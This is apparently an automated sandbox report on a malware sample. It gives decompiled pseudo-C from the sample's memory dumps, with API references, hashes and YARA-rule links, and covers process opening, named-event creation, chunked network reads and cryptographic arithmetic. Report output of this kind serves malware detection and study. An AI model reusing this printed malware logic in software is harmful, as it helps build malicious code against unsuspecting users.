									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x03082a2a
0x03082a31
0x03082a36
0x03082a39
0x03082a40
0x03082a43
0x03082a46
0x03082a4d
0x03082a50
0x03082ba4
0x03082ba6
0x03082ba8
0x03082bad
0x03082bad
0x03082a56
0x03082a59
0x03082a5c
0x03082a5e
0x03082a5e
0x03082a62
0x00000000
0x00000000
0x03082a66
0x03082a92
0x03082a97
0x03082a99
0x03082a99
0x03082a9c
0x03082a9f
0x03082a9f
0x03082aa1
0x00000000
0x03082a6c
0x03082a6e
0x03082a8d
0x03082a8d
0x03082aa4
0x03082aa4
0x03082aa5
0x03082aa5
0x03082aa8
0x00000000
0x00000000
0x00000000
0x03082aa8
0x03082a72
0x03082ab9
0x03082abd
0x03082b97
0x03082b99
0x03082b99
0x03082b9a
0x03082b9d
0x00000000
0x03082b9d
0x03082ad7
0x03082adb
0x03082b93
0x00000000
0x03082b93
0x03082ae1
0x03082ae4
0x03082ae8
0x03082aee
0x03082af1
0x03082b89
0x03082b89
0x00000000
0x03082b8f
0x03082afc
0x03082b05
0x03082b19
0x03082b20
0x03082b35
0x03082b3b
0x03082b43
0x00000000
0x00000000
0x00000000
0x00000000
0x03082b45
0x03082b45
0x03082b45
0x03082b4c
0x03082b54
0x00000000
0x00000000
0x03082b56
0x03082b5f
0x00000000
0x00000000
0x00000000
0x03082b61
0x03082b63
0x03082b66
0x03082b66
0x03082b69
0x03082b6d
0x03082b70
0x03082b76
0x03082b79
0x03082b80
0x00000000
0x03082afc
0x03082a77
0x03082a82
0x03082a85
0x03082a87
0x03082a87
0x03082a8a
0x03082a8c
0x00000000
0x03082a8c
0x03082a66
0x03082aac
0x03082ab1
0x03082ab3
0x03082ab3
0x03082ab6
0x03082ab6
0x00000000

APIs

Part of subcall function 03086837: RtlAllocateHeap.NTDLL(00000000,00000000,03084197), ref: 03086843

lstrcpy.KERNEL32(63699BC4,00000020), ref: 03082B20
lstrcat.KERNEL32(63699BC4,00000020), ref: 03082B35
lstrcmp.KERNEL32(00000000,63699BC4), ref: 03082B4C
lstrlen.KERNEL32(63699BC4), ref: 03082B70

Strings

, xrefs: 03082AB9

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 353fb4376e30683477d87cdf1d4507d9253c5a1b6aad525819344bcb16bfc82f
Instruction ID: 8c17b58acd845df5e086930562cad4804456a0abea44a3766447e180968865e0
Opcode Fuzzy Hash: 353fb4376e30683477d87cdf1d4507d9253c5a1b6aad525819344bcb16bfc82f
Instruction Fuzzy Hash: FF518031A02218EFDF21EF99C584AEDFBF9FF45314F198856E9959B201C7709651CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E383E, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1E3856

Part of subcall function 6E1D621F: HeapFree.KERNEL32(00000000,00000000,?,6E1E3B19,?,00000000,?,?,?,6E1E3E1D,?,00000007,?,?,6E1E2465,?), ref: 6E1D6235
Part of subcall function 6E1D621F: GetLastError.KERNEL32(?,?,6E1E3B19,?,00000000,?,?,?,6E1E3E1D,?,00000007,?,?,6E1E2465,?,?), ref: 6E1D6247

_free.LIBCMT ref: 6E1E3868
_free.LIBCMT ref: 6E1E387A
_free.LIBCMT ref: 6E1E388C
_free.LIBCMT ref: 6E1E389E

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 291e694f83395eb12b6eb7eec8cd8d87c7fd24581eef7aec0f74801880472730
Instruction ID: 1ec6db3c60b1c4bb4eb68d1cc0ada0afe9d07ddf7d1eedcfa0a8b6db1e645a04
Opcode Fuzzy Hash: 291e694f83395eb12b6eb7eec8cd8d87c7fd24581eef7aec0f74801880472730
Instruction Fuzzy Hash: 07F04F71458A189BCE84DA98E1D8C8A73DEEA117147601E49F128D7D40C734F8C1AAB0

Uniqueness

Uniqueness Score: -1.00%

Function 03084C1B, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03084C1B(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x308a2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0x308a2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0x308a2b0 = _t6;
				 *0x308a2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0x308a2ac = _t7;
				if(_t7 == 0) {
					 *0x308a2ac =  *0x308a2ac | 0xffffffff;
				}
				return 0;
			}

0x03084c23
0x03084c2b
0x03084c30
0x00000000
0x03084c7d
0x03084c32
0x03084c3a
0x03084c7a
0x00000000
0x03084c7a
0x03084c3c
0x03084c41
0x03084c53
0x03084c58
0x03084c5e
0x03084c66
0x03084c6b
0x03084c6d
0x03084c6d
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,03086B4E,?,?,00000001), ref: 03084C23
GetVersion.KERNEL32(?,00000001), ref: 03084C32
GetCurrentProcessId.KERNEL32(?,00000001), ref: 03084C41
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 03084C5E
GetLastError.KERNEL32(?,00000001), ref: 03084C7D

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: fa25a434e7838f29c7d241ea8271d374cd2b09fa088b6125083b03ff2795ed70
Instruction ID: 63b65bfb743e45441da5398245f2f44ad4c3a531be65ba962ab585f7f75dac07
Opcode Fuzzy Hash: fa25a434e7838f29c7d241ea8271d374cd2b09fa088b6125083b03ff2795ed70
Instruction Fuzzy Hash: 61F03070747302DFD7A0FF6AAC09B293BA8A704760F14451AE6C6D52D8D7794011DF25

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DF7A3, Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6E1DF82A

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 171435b5a8bdbf964f5834635ee3c3edfac2db330efffc875cd1ef04e4992003
Instruction ID: 8691fe34c754b06597c698f86a893f25c12367394b9cc14d2be54d070424f0f9
Opcode Fuzzy Hash: 171435b5a8bdbf964f5834635ee3c3edfac2db330efffc875cd1ef04e4992003
Instruction Fuzzy Hash: 4EB13732D042469FDB05CFA8C850BEEBBF5EF59300F34846AE8659B341D3348A8ADB51

Uniqueness

Uniqueness Score: -1.00%

Function 0308161A, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 0308165B
SysFreeString.OLEAUT32(00000000), ref: 0308173E

Part of subcall function 03086C6D: SysAllocString.OLEAUT32(030892B0), ref: 03086CBD

SafeArrayDestroy.OLEAUT32(?), ref: 03081792
SysFreeString.OLEAUT32(?), ref: 030817A0

Part of subcall function 03081FC2: Sleep.KERNEL32(000001F4), ref: 0308200A

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: 1b3f659121b40339cb35cc2c5cf4d5c164fe0e806e7e5b00305b43ac76d2914d
Instruction ID: 613ce27ad8c6fe4a0a2f6480d5c85215fd3bc2fec28116d7b52accea30b014e7
Opcode Fuzzy Hash: 1b3f659121b40339cb35cc2c5cf4d5c164fe0e806e7e5b00305b43ac76d2914d
Instruction Fuzzy Hash: 7A512076901249EFCB10EFE8C8848EEB7B6FF88340B148869E545DB214D735AD46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 03086C6D, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E03086C6D(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x308a2d4; // 0x2b2d5a8
					_t5 = _t102 + 0x308b038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x30892b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x308a2d4; // 0x2b2d5a8
												_t28 = _t108 + 0x308b0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x308a2d4; // 0x2b2d5a8
														_t33 = _t78 + 0x308b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x03086c72
0x03086c7b
0x03086c7c
0x03086c80
0x03086c86
0x03086c8c
0x03086c95
0x03086c9b
0x03086ca5
0x03086ca7
0x03086cad
0x03086cb2
0x03086cbd
0x03086cc5
0x03086cc8
0x03086deb
0x03086cce
0x03086cce
0x03086cdb
0x03086ce1
0x03086ce7
0x03086ceb
0x03086cf1
0x03086cfe
0x03086d02
0x03086d08
0x03086d0b
0x03086d11
0x03086d17
0x03086d1d
0x03086d20
0x03086d23
0x03086d29
0x03086d32
0x03086d38
0x03086d39
0x03086d3c
0x03086d3d
0x03086d3e
0x03086d46
0x03086d47
0x03086d48
0x03086d4a
0x03086d4e
0x03086d52
0x00000000
0x00000000
0x03086d58
0x03086d61
0x03086d67
0x03086d71
0x03086d75
0x03086d77
0x03086d84
0x03086d88
0x03086d90
0x03086d95
0x03086da7
0x03086da9
0x03086daf
0x03086daf
0x03086db8
0x03086db8
0x03086dba
0x03086dc0
0x03086dc0
0x03086dc3
0x03086dc9
0x03086dcc
0x03086dd5
0x00000000
0x00000000
0x00000000
0x03086dd5
0x03086d29
0x03086d23
0x03086d0b
0x03086ddb
0x03086ddb
0x03086de1
0x03086de1
0x03086de7
0x03086de7
0x03086df0
0x03086df6
0x03086df6
0x03086cb2
0x03086dff

APIs

SysAllocString.OLEAUT32(030892B0), ref: 03086CBD
lstrcmpW.KERNEL32(00000000,0076006F), ref: 03086D9F
SysFreeString.OLEAUT32(00000000), ref: 03086DB8
SysFreeString.OLEAUT32(?), ref: 03086DE7

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: fa58df02965623694fd78b205b17889a4e3336c1f4f0fdc1bb65f84a8e1e7926
Instruction ID: db70c0382e273e7a0119df99f5fe68591a6f4fe628350de0838ca4c722e6c622
Opcode Fuzzy Hash: fa58df02965623694fd78b205b17889a4e3336c1f4f0fdc1bb65f84a8e1e7926
Instruction Fuzzy Hash: AC513F75D01619DFCB00EFA8C8888EEF7B9EF88704B154594E915EB315D7329D01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03085D93, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E03085D93(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E030828F1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E03081000(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E03083915(_t101,  &_v428, _a8, _t96 - _t81);
					E03083915(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E03081000(_t101,  &E0308A188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E03081000(_a16, _a4);
						E03083B6F(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L03087D8C();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L03087D86();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E0308679F(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E03085AC5(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E03084A54(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E0308A188) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x03085d96
0x03085da2
0x03085da8
0x03085dad
0x03085db1
0x03085f23
0x03085f27
0x03085f27
0x03085db7
0x03085dbb
0x03085dc1
0x03085dc2
0x03085dcd
0x03085dd3
0x03085dd8
0x03085ddb
0x03085df5
0x03085e04
0x03085e10
0x03085e1a
0x03085e1f
0x03085e21
0x03085e24
0x03085edb
0x03085ee1
0x03085ef2
0x03085f05
0x03085f1b
0x00000000
0x03085f20
0x03085e2d
0x03085e34
0x03085e38
0x03085e3e
0x03085e40
0x03085e42
0x03085e44
0x03085e46
0x03085e50
0x03085e55
0x03085e57
0x03085e59
0x03085e5a
0x03085e5b
0x03085e5c
0x03085e63
0x03085e6a
0x03085e6d
0x03085e6d
0x03085e3a
0x03085e3a
0x03085e3a
0x03085e75
0x03085e7d
0x03085e89
0x03085e8e
0x03085e8e
0x03085e93
0x00000000
0x00000000
0x03085e95
0x03085e98
0x03085ea5
0x00000000
0x00000000
0x03085ea7
0x03085ea7
0x03085eb4
0x03085e8e
0x03085e93
0x00000000
0x00000000
0x00000000
0x03085e93
0x03085ebe
0x03085ec1
0x03085ec4
0x03085ecb
0x03085ecb
0x03085ed8
0x00000000
0x03085ed8
0x03085dc4
0x03085dc8
0x03085dc9
0x03085dcb
0x00000000
0x00000000
0x00000000
0x03085dcb
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 03085E46
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 03085E5C
memset.NTDLL ref: 03085F05
memset.NTDLL ref: 03085F1B

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 8fa7124c35f7cbbe5c2d2890e65f9d679caf908e3bf925fd78f4d0f0979fe90b
Instruction ID: 2907f4023587fa051c377e2ca86b542aec4ea515764eb7f49f7e134270153f29
Opcode Fuzzy Hash: 8fa7124c35f7cbbe5c2d2890e65f9d679caf908e3bf925fd78f4d0f0979fe90b
Instruction Fuzzy Hash: A941B535A02319AFDB24FF68CC40BDE77B9EF86750F104565B895AB280DB709E458F40

Uniqueness

Uniqueness Score: -1.00%

Function 6E1EAFA6, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1EB076
_free.LIBCMT ref: 6E1EB09F
SetEndOfFile.KERNEL32(00000000,6E1E0E5E,00000000,6E1E11A1,?,?,?,?,?,?,?,6E1E0E5E,6E1E11A1,00000000), ref: 6E1EB0D1
GetLastError.KERNEL32(?,?,?,?,?,?,?,6E1E0E5E,6E1E11A1,00000000,?,?,?,?,00000000), ref: 6E1EB0ED

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 1f360a70c9c68b07c86e4b2edc52ade4280513b48e37b7f8bbef399c0cd14e17
Instruction ID: c126ce50b92f4156d23e692048c9039697f0868184c569d8380d29ca1aa0c822
Opcode Fuzzy Hash: 1f360a70c9c68b07c86e4b2edc52ade4280513b48e37b7f8bbef399c0cd14e17
Instruction Fuzzy Hash: CD41D272600B05DADB319AE8CC41FEE37B9EF55324F250910F524A7998EB34E8C4A721

Uniqueness

Uniqueness Score: -1.00%

Function 030814A8, Relevance: 6.1, APIs: 4, Instructions: 120
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E030814A8(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_push( &_v24);
							_push(1);
							_push(0);
							if( *0x308a144() != 0) {
								_v8 = 8;
							} else {
								_t47 = E03086837(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0x308a2c4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E030850CA(_v20);
											if(_v8 == 0) {
												_v8 = E030837FC(_v24, _t74);
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E030825C7(__eax);
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}

0x030814a9
0x030814af
0x030814ba
0x030814ba
0x030814bc
0x03085aff
0x03085b02
0x03085b0b
0x03085b0e
0x03085b11
0x03085b19
0x03085c17
0x03085c22
0x03085c25
0x03085c27
0x00000000
0x03085c27
0x03085b1f
0x03085b22
0x03085c2a
0x03085c2a
0x03085b28
0x03085b2b
0x03085b2c
0x03085b2e
0x03085b37
0x03085c0e
0x03085b3d
0x03085b43
0x03085b4a
0x03085b4d
0x03085bfc
0x03085b53
0x00000000
0x03085b53
0x03085b53
0x03085b53
0x03085b53
0x03085b58
0x03085b5a
0x03085b5a
0x03085b67
0x03085b6f
0x00000000
0x00000000
0x03085b71
0x03085b7e
0x03085b84
0x03085b84
0x03085b87
0x00000000
0x00000000
0x03085b89
0x03085b94
0x03085ba8
0x03085bde
0x03085baa
0x03085baa
0x03085bb1
0x03085bb9
0x00000000
0x03085bbb
0x03085bbb
0x03085bc6
0x03085bc9
0x03085bd0
0x00000000
0x03085bd0
0x03085bc9
0x03085bb9
0x03085be1
0x03085be4
0x03085bec
0x03085bf7
0x03085bf7
0x00000000
0x03085bec
0x03085b91
0x00000000
0x03085bd3
0x03085bd3
0x00000000
0x03085bdc
0x03085c03
0x03085c03
0x03085c09
0x03085c09
0x03085b37
0x03085b22
0x03085c34
0x030814b1
0x030814b1
0x030814b8
0x030814c3
0x00000000
0x00000000
0x00000000
0x030814b8

APIs

WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,03087134,00000000,?), ref: 03085B9B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,03087134,00000000,?,?), ref: 03085BBB

Part of subcall function 030825C7: wcstombs.NTDLL ref: 03082687

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLastObjectSingleWaitwcstombs
String ID:
API String ID: 2344289193-0
Opcode ID: 4fa3531cd006d72965367e05d285d814ffb554ec5625c88b474921fabaf684c3
Instruction ID: f9199bafadb677bb9e5d15a557df961b5196259e0d6ab2ffcceb30be3c5d55e1
Opcode Fuzzy Hash: 4fa3531cd006d72965367e05d285d814ffb554ec5625c88b474921fabaf684c3
Instruction Fuzzy Hash: AE411A75902209EFDF20FFA8CD849AEBBB9EB05344F1444A9E582E6240E7749A44DF50

Uniqueness

Uniqueness Score: -1.00%

Function 030873C3, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E030873C3(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x308a2c8; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0x308a2d4; // 0x2b2d5a8
				_t3 = _t8 + 0x308b8a2; // 0x61636f4c
				_t25 = 0;
				_t30 = E03082DEA(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x308a2f8, 1, 0, _t30);
					E030850CA(_t30);
				}
				_t12 =  *0x308a2b4; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E0308513E() == 0) {
						_t28 =  *0x308a120( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E03086BE1(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
